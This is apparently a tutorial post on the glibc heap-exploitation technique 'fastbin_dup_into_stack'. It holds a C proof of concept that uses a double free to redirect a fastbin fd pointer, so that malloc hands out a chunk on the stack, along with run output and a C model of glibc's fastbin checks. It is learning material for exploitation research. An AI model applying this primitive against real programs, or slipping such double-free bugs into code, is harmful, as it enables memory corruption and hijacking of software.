3.fastbin_dup_into_stack

0x00:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    /* Size field of the fake chunk: the fake chunk starts 8 bytes below
     * stack_var, so stack_var sits where malloc reads the size (0x20 also works). */
    unsigned long long stack_var = 0x21;

    fprintf(stderr, "Allocating 3 buffers.\n");
    char *a = malloc(9);   /* request 9 -> 0x20-byte fastbin chunk */
    char *b = malloc(9);
    char *c = malloc(9);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
    fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
    fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);

    /* Double free: a, then b, then a again. free() only compares the chunk
     * against the current top of the fastbin, so freeing b in between keeps
     * the second free(a) from being detected. The bin is now a -> b -> a. */
    fprintf(stderr, "Freeing the first one %p.\n", a);
    free(a);
    fprintf(stderr, "Then freeing another one %p.\n", b);
    free(b);
    fprintf(stderr, "Freeing the first one %p again.\n", a);
    free(a);

    fprintf(stderr, "Allocating 4 buffers.\n");
    /* d is chunk a again; its first 8 bytes are the fd pointer of the copy of a
     * still in the fastbin. Point fd at the fake chunk 8 bytes below stack_var. */
    unsigned long long *d = malloc(9);
    *d = (unsigned long long) ( ( (char*)&stack_var ) - sizeof(d) );
    /* Note: &d is the stack address of the variable d itself, not the fd value just written. */
    fprintf(stderr, "4nd malloc(9) %p points to %p\n", d, &d);
    char *e = malloc(9);   /* returns b */
    strcpy(e, "EEEEEEEE");
    fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
    char *f = malloc(9);   /* returns a again; the fake chunk is now at the head of the bin */
    strcpy(f, "FFFFFFFF");
    fprintf(stderr, "6rd malloc(9) %p points to %s\n", f, f);
    char *g = malloc(9);   /* returns the fake chunk on the stack, 8 bytes above stack_var */
    strcpy(g, "GGGGGGGG");
    fprintf(stderr, "7th malloc(9) %p points to %s\n", g, g);
    return 0;
}
```
```console
user@ubuntu:~/workspace/pwn/fastbin_dup_into_stack$ vim fastbin_dup_into_stack.c
user@ubuntu:~/workspace/pwn/fastbin_dup_into_stack$ gcc -g fastbin_dup_into_stack.c -o fastbin_dup_into_stack
user@ubuntu:~/workspace/pwn/fastbin_dup_into_stack$ ./fastbin_dup_into_stack
Allocating 3 buffers.
1st malloc(9) 0x214b010 points to AAAAAAAA
2nd malloc(9) 0x214b030 points to BBBBBBBB
3rd malloc(9) 0x214b050 points to CCCCCCCC
Freeing the first one 0x214b010.
Then freeing another one 0x214b030.
Freeing the first one 0x214b010 again.
Allocating 4 buffers.
4nd malloc(9) 0x214b010 points to 0x7ffc8bc6ce40
5nd malloc(9) 0x214b030 points to EEEEEEEE
6rd malloc(9) 0x214b010 points to FFFFFFFF
7th malloc(9) 0x7ffc8bc6ce40 points to GGGGGGGG
```

The idea is to overwrite the fd pointer so that it points at a forged free chunk, and then have malloc hand out a chunk at that forged address. The underlying bug is the same double free as before; only the content written into fd differs. stack_var is set to 0x21 (0x20 works just as well) so that, with the fake chunk placed at the stack address minus 0x8, stack_var serves as the fake chunk's size field.

When glibc services an allocation whose size falls in the fastbin range, it looks for a suitable chunk in the corresponding bin. Before returning the candidate chunk, glibc computes a fastbin index from that chunk's size field and compares it with the index of the bin the chunk was taken from; if the two do not match, the chunk's size field is treated as corrupted and malloc aborts. This is why the fake chunk's size field must hold a correct value for the requested size.
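As an added example (not code from the original post or from how2heap), the two glibc fastbin checks the text relies on, modelled as small C functions using the x86-64 constants (SIZE_SZ = 8, 16-byte alignment); the function names are my own, and the free-list model keeps only the bin's top pointer, which is all the fasttop check consults.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constants for x86-64 glibc (SIZE_SZ = 8, MALLOC_ALIGNMENT = 16). */
#define SIZE_SZ 8
#define MALLOC_ALIGN_MASK 15
#define MINSIZE 0x20
#define SIZE_BITS 0x7UL   /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

/* request2size: malloc(9) becomes a 0x20-byte chunk, malloc(25) a 0x30-byte one. */
size_t request2size(size_t req) {
    size_t sz = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~(size_t)MALLOC_ALIGN_MASK;
    return sz < MINSIZE ? MINSIZE : sz;
}

/* fastbin_index on 64-bit: (size >> 4) - 2, so 0x20 -> bin 0, 0x30 -> bin 1. */
unsigned fastbin_index(size_t chunk_size) {
    return (unsigned)((chunk_size >> 4) - 2);
}

/* The check malloc runs on the chunk it pops from a fastbin: the chunk's own
 * size field (flag bits masked off) must index the bin it was taken from,
 * otherwise "malloc(): memory corruption (fast)". Returns true if accepted,
 * which is why 0x20 and 0x21 both work as stack_var for a malloc(9) request. */
bool malloc_accepts_size_field(size_t req, uint64_t size_field) {
    unsigned idx = fastbin_index(request2size(req));
    return fastbin_index(size_field & ~SIZE_BITS) == idx;
}

/* The check free runs: the chunk must not already be the bin's top chunk,
 * otherwise "double free or corruption (fasttop)". Only the single top
 * pointer is consulted, which is why the a, b, a sequence above is not caught.
 * Each letter of seq names one chunk; returns true if every free is accepted. */
bool free_sequence_accepted(const char *seq) {
    char top = '\0';                       /* model of the fastbin head */
    for (size_t i = 0; i < strlen(seq); i++) {
        if (seq[i] == top) return false;   /* same chunk freed twice in a row */
        top = seq[i];
    }
    return true;
}
```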